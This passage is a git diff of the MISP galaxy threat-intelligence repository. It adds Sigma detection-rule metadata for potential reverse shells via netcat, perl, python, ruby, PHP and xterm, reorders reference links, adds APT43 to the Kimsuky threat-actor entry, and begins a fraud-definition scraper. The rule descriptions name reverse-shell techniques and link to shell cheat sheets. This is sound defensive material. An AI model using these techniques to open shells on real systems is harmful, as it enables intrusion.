"https://man7.org/linux/man-pages/man8/getcap.8.html",
- "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/",
- "https://mn3m.info/posts/suid-vs-capabilities/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml"
],
"tags": [
@@ -90937,8 +85696,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html",
"https://blog.aquasec.com/container-security-tnt-container-attack",
+ "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml"
],
"tags": [
@@ -90971,8 +85730,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://github.com/Neo23x0/auditd/blob/master/audit.rules",
"Self Experience",
+ "https://github.com/Neo23x0/auditd/blob/master/audit.rules",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml"
],
"tags": [
@@ -91005,8 +85764,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml"
],
"tags": [
@@ -91237,8 +85996,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://linux.die.net/man/1/wget",
"https://gtfobins.github.io/gtfobins/wget/",
+ "https://linux.die.net/man/1/wget",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml"
],
"tags": [
@@ -91614,9 +86373,9 @@
"logsource.product": "linux",
"refs": [
"https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md",
"https://linux.die.net/man/1/chage",
"https://man7.org/linux/man-pages/man1/passwd.1.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml"
],
"tags": [
@@ -91716,10 +86475,10 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://access.redhat.com/articles/4409591#audit-record-types-2",
"https://linux.die.net/man/8/pam_tty_audit",
- "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md",
+ "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing",
+ "https://access.redhat.com/articles/4409591#audit-record-types-2",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml"
],
"tags": [
@@ -91826,9 +86585,9 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://access.redhat.com/articles/4409591#audit-record-types-2",
- "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07",
"https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files",
+ "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07",
+ "https://access.redhat.com/articles/4409591#audit-record-types-2",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml"
],
"tags": [
@@ -91861,9 +86620,9 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan",
"https://book.hacktricks.xyz/shells/shells/linux",
+ "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml"
],
"tags": [
@@ -92020,8 +86779,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://redcanary.com/blog/ebpf-malware/",
"https://man7.org/linux/man-pages/man7/bpf-helpers.7.html",
+ "https://redcanary.com/blog/ebpf-malware/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml"
],
"tags": [
@@ -92166,9 +86925,9 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://linux.die.net/man/8/useradd",
- "https://digital.nhs.uk/cyber-alerts/2018/cc-2825",
"https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid",
+ "https://digital.nhs.uk/cyber-alerts/2018/cc-2825",
+ "https://linux.die.net/man/8/useradd",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml"
],
"tags": [
@@ -92333,9 +87092,9 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://artkond.com/2017/03/23/pivoting-guide/",
"http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html",
"https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb",
+ "https://artkond.com/2017/03/23/pivoting-guide/",
"http://pastebin.com/FtygZ1cg",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml"
],
@@ -92369,8 +87128,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md",
"https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml"
],
"tags": [
@@ -92601,8 +87360,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml",
"https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c",
+ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml"
],
"tags": [
@@ -92635,8 +87394,8 @@
"logsource.category": "No established category",
"logsource.product": "linux",
"refs": [
- "https://twitter.com/matthieugarin/status/1183970598210412546",
"https://www.openwall.com/lists/oss-security/2019/10/14/1",
+ "https://twitter.com/matthieugarin/status/1183970598210412546",
"https://access.redhat.com/security/cve/cve-2019-14287",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml"
],
@@ -92868,8 +87627,8 @@
"logsource.category": "file_event",
"logsource.product": "linux",
"refs": [
- "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/",
"https://www.makeuseof.com/how-to-install-and-use-doas/",
+ "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml"
],
"tags": [
@@ -93012,8 +87771,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://twitter.com/matthieugarin/status/1183970598210412546",
"https://www.openwall.com/lists/oss-security/2019/10/14/1",
+ "https://twitter.com/matthieugarin/status/1183970598210412546",
"https://access.redhat.com/security/cve/cve-2019-14287",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml"
],
@@ -93180,8 +87939,8 @@
"logsource.product": "linux",
"refs": [
"https://gtfobins.github.io/gtfobins/vimdiff/",
- "https://gtfobins.github.io/gtfobins/rvim/",
"https://gtfobins.github.io/gtfobins/vim/",
+ "https://gtfobins.github.io/gtfobins/rvim/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml"
],
"tags": [
@@ -93334,10 +88093,10 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://linuxhint.com/uninstall-debian-packages/",
- "https://linuxhint.com/uninstall_yum_package/",
- "https://sysdig.com/blog/mitre-defense-evasion-falco",
"https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command",
+ "https://linuxhint.com/uninstall-debian-packages/",
+ "https://sysdig.com/blog/mitre-defense-evasion-falco",
+ "https://linuxhint.com/uninstall_yum_package/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remove_package.yml"
],
"tags": [
@@ -93467,7 +88226,7 @@
"value": "Chmod Suspicious Directory"
},
{
- "description": "Detects python spawning a pretty tty",
+ "description": "Detects python spawning a pretty tty which could be indicative of potential reverse shell activity",
"meta": {
"author": "Nextron Systems",
"creation_date": "2022/06/03",
@@ -93534,6 +88293,30 @@
"uuid": "3be619f4-d9ec-4ea8-a173-18fdd01996ab",
"value": "Flush Iptables Ufw Chain"
},
+ {
+ "description": "Detects execution of the perl binary with the \"-e\" flag and common strings related to potential reverse shell activity",
+ "meta": {
+ "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/07",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_lnx_perl_reverse_shell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "259df6bc-003f-4306-9f54-4ff1a08fa38e",
+ "value": "Potential Perl Reverse Shell Execution"
+ },
{
"description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134",
"meta": {
@@ -93577,10 +88360,44 @@
"uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66",
"value": "Atlassian Confluence CVE-2022-26134"
},
+ {
+ "description": "Detects usage of \"xterm\" as a potential reverse shell tunnel",
+ "meta": {
+ "author": "@d4ns4n_",
+ "creation_date": "2023/04/24",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_lnx_xterm_reverse_shell.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "4e25af4b-246d-44ea-8563-e42aacab006b",
+ "value": "Potential Xterm Reverse Shell"
+ },
{
"description": "Detects a suspicious curl process start the adds a file to a web request",
"meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "author": "Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)",
"creation_date": "2022/09/15",
"falsepositive": [
"Scripts created by developers and admins"
@@ -93590,11 +88407,11 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
+ "https://curl.se/docs/manpage.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
"https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
"https://twitter.com/d1r4c/status/1279042657508081664",
"https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76",
- "https://curl.se/docs/manpage.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml"
],
"tags": [
@@ -93622,6 +88439,30 @@
"uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582",
"value": "Suspicious Curl File Upload - Linux"
},
+ {
+ "description": "Detects execution of ruby with the \"-e\" flag and calls to \"socket\" related functions. This could be an indication of a potential attempt to setup a reverse shell",
+ "meta": {
+ "author": "@d4ns4n_",
+ "creation_date": "2023/04/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_lnx_ruby_reverse_shell.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "b8bdac18-c06e-4016-ac30-221553e74f59",
+ "value": "Potential Ruby Reverse Shell"
+ },
{
"description": "Detects usage of \"apt\" and \"apt-get\" as a GTFOBin to execute and proxy command and binary execution",
"meta": {
@@ -93635,8 +88476,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://gtfobins.github.io/gtfobins/apt-get/",
"https://gtfobins.github.io/gtfobins/apt/",
+ "https://gtfobins.github.io/gtfobins/apt-get/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml"
],
"tags": [
@@ -93669,10 +88510,10 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://linuxize.com/post/how-to-delete-group-in-linux/",
"https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
"https://linux.die.net/man/8/userdel",
"https://www.cyberciti.biz/faq/linux-remove-user-command/",
+ "https://linuxize.com/post/how-to-delete-group-in-linux/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml"
],
"tags": [
@@ -94015,6 +88856,30 @@
"uuid": "b86d356d-6093-443d-971c-9b07db583c68",
"value": "Suspicious Curl Change User Agents - Linux"
},
+ {
+ "description": "Detects executing python with keywords related to network activity that could indicate a potential reverse shell",
+ "meta": {
+ "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/24",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_lnx_python_reverse_shell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "32e62bc7-3de0-4bb1-90af-532978fe42c0",
+ "value": "Potential Python Reverse Shell"
+ },
{
"description": "Detects suspicious sub processes of web server processes",
"meta": {
@@ -94028,8 +88893,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/",
"https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF",
+ "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml"
],
"tags": [
@@ -94129,8 +88994,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/",
"https://bpftrace.org/",
+ "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml"
],
"tags": [
@@ -94150,6 +89015,30 @@
"uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39",
"value": "BPFtrace Unsafe Option Usage"
},
+ {
+ "description": "Detects usage of the PHP CLI with the \"-r\" flag which allows it to run inline PHP code. The rule looks for calls to the \"fsockopen\" function which allows the creation of sockets.\nAttackers often leverage this in combination with functions such as \"exec\" or \"fopen\" to initiate a reverse shell connection.\n",
+ "meta": {
+ "author": "@d4ns4n_",
+ "creation_date": "2023/04/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_lnx_php_reverse_shell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "c6714a24-d7d5-4283-a36b-3ffd091d5f7e",
+ "value": "Potential PHP Reverse Shell"
+ },
{
"description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n",
"meta": {
@@ -94281,10 +89170,10 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://linuxize.com/post/how-to-delete-group-in-linux/",
"https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/",
"https://linux.die.net/man/8/groupdel",
"https://www.cyberciti.biz/faq/linux-remove-user-command/",
+ "https://linuxize.com/post/how-to-delete-group-in-linux/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml"
],
"tags": [
@@ -94317,8 +89206,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS",
"https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html",
+ "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml"
],
"tags": [
@@ -94351,9 +89240,9 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://github.com/diego-treitos/linux-smart-enumeration",
"https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes",
"https://github.com/carlospolop/PEASS-ng",
+ "https://github.com/diego-treitos/linux-smart-enumeration",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml"
],
"tags": [
@@ -94507,6 +89396,31 @@
"uuid": "3e102cd9-a70d-4a7a-9508-403963092f31",
"value": "Linux Network Service Scanning"
},
+ {
+ "description": "Detects execution of the bash shell with the interactive flag \"-i\".",
+ "meta": {
+ "author": "@d4ns4n_",
+ "creation_date": "2023/04/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_lnx_bash_interactive_shell.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://www.revshells.com/",
+ "https://linux.die.net/man/1/bash",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "6104e693-a7d6-4891-86cb-49a258523559",
+ "value": "Bash Interactive Shell"
+ },
{
"description": "Detects when the file \"passwd\" or \"shadow\" is copied from tmp path",
"meta": {
@@ -94748,6 +89662,43 @@
"uuid": "21541900-27a9-4454-9c4c-3f0a4240344a",
"value": "OMIGOD SCX RunAsProvider ExecuteShellCommand"
},
+ {
+ "description": "Detects execution of netcat with the \"-e\" flag followed by common shells. This could be a sign of a potential reverse shell setup.",
+ "meta": {
+ "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/07",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_lnx_netcat_reverse_shell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://man7.org/linux/man-pages/man1/ncat.1.html",
+ "https://www.infosecademy.com/netcat-reverse-shells/",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://www.revshells.com/",
+ "https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "7f734ed0-4f47-46c0-837f-6ee62505abd9",
+ "value": "Potential Netcat Reverse Shell Execution"
+ },
{
"description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments",
"meta": {
@@ -94761,8 +89712,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://gtfobins.github.io/gtfobins/nohup/",
"https://www.computerhope.com/unix/unohup.htm",
+ "https://gtfobins.github.io/gtfobins/nohup/",
"https://en.wikipedia.org/wiki/Nohup",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml"
],
@@ -94873,10 +89824,10 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "Internal Research",
"https://github.com/Gui774ume/ebpfkit",
- "https://github.com/pathtofile/bad-bpf",
+ "Internal Research",
"https://github.com/carlospolop/PEASS-ng",
+ "https://github.com/pathtofile/bad-bpf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml"
],
"tags": [
@@ -94899,9 +89850,9 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
+ "https://bpftrace.org/",
"https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html",
"https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/",
- "https://bpftrace.org/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml"
],
"tags": [
@@ -94958,9 +89909,9 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/",
"https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144",
"https://blogs.blackberry.com/",
+ "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml"
],
"tags": [
@@ -95161,9 +90112,9 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
- "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html",
"https://github.com/apache/spark/pull/36315/files",
+ "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html",
+ "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml"
],
"tags": [
@@ -95230,8 +90181,8 @@
"logsource.category": "process_creation",
"logsource.product": "linux",
"refs": [
- "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/",
"https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/",
+ "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml"
],
"tags": [
@@ -95309,5 +90260,5 @@
"value": "Security Software Discovery - Linux"
}
],
- "version": 20230420
+ "version": 20230511
}
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index afb3922..871d273 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -5235,14 +5235,16 @@
"https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
"https://attack.mitre.org/groups/G0086/",
"https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
- "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite"
+ "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
+ "https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report"
],
"synonyms": [
"Velvet Chollima",
"Black Banshee",
"Thallium",
"Operation Stolen Pencil",
- "G0086"
+ "G0086",
+ "APT43"
]
},
"related": [
diff --git a/galaxies/attck4fraud.json b/galaxies/attck4fraud.json
index a4aad0f..dd21acc 100644
--- a/galaxies/attck4fraud.json
+++ b/galaxies/attck4fraud.json
@@ -8,12 +8,13 @@
"Perform Fraud",
"Obtain Fraudulent Assets",
"Assets Transfer",
- "Monetisation"
+ "Monetisation",
+ "Due Diligence"
]
},
"name": "attck4fraud",
"namespace": "misp",
"type": "financial-fraud",
"uuid": "cc0c8ae9-aec2-42c6-9939-f4f82b051836",
- "version": 1
+ "version": 2
}
diff --git a/tools/gen_360net.py b/tools/gen_360net.py
index 5d03562..cefcb5a 100755
--- a/tools/gen_360net.py
+++ b/tools/gen_360net.py
@@ -40,7 +40,7 @@ for actor in list_data['data']['list']:
refs = []
for ref in actor['recommends']:
refs.append(ref['url'])
- refs = list(set(refs))
+ refs = sorted(list(set(refs)))
cluster = {
'value': f"{actor['name']} - {actor['code']}",
'description': actor['description'],
@@ -67,9 +67,9 @@ json_galaxy = {
'uuid': "20de4abf-f000-48ec-a929-3cdc5c2f3c23",
'version': 1
}
+
with open(os.path.join('..', 'clusters', '360net.json'), 'r') as f:
json_cluster = json.load(f)
-
json_cluster['values'] = clusters
json_cluster['version'] += 1
diff --git a/tools/gen_east_fraud.py b/tools/gen_east_fraud.py
new file mode 100644
index 0000000..b25e183
--- /dev/null
+++ b/tools/gen_east_fraud.py
@@ -0,0 +1,111 @@
+#!/usr/bin/env python3
+#
+# A simple convertor of the E.A.S.T. Fraud definitions to a MISP Galaxy datastructure.
+# https://www.association-secure-transactions.eu/industry-information/fraud-definitions/
+# Copyright (c) 2023 MISP Project
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Affero General Public License as
+# published by the Free Software Foundation, either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU Affero General Public License for more details.
+#
+# You should have received a copy of the GNU Affero General Public License
+# along with this program. If not, see .
+
+from bs4 import BeautifulSoup
+import json
+import requests
+import string
+import uuid
+import os
+
+url = 'https://www.association-secure-transactions.eu/industry-information/fraud-definitions/'
+
+try:
+ response = requests.get(url, timeout=3)
+except Exception:
+ exit("ERROR: Could not download the webpage. Are you sure you have internet connectivity?")
+
+with open(os.path.join('..', 'galaxies', 'attck4fraud.json'), 'r') as f:
+ tactics_options = json.load(f)['kill_chain_order']['fraud-tactics']
+
+with open(os.path.join('..', 'clusters', 'attck4fraud.json'), 'r') as f:
+ json_data = json.load(f)
+# build value/synonym based mapping to UUID allowing us to lookup what exists
+mapping = {}
+for cluster in json_data['values']:
+ mapping[cluster['value'].lower()] = cluster['uuid']
+ try:
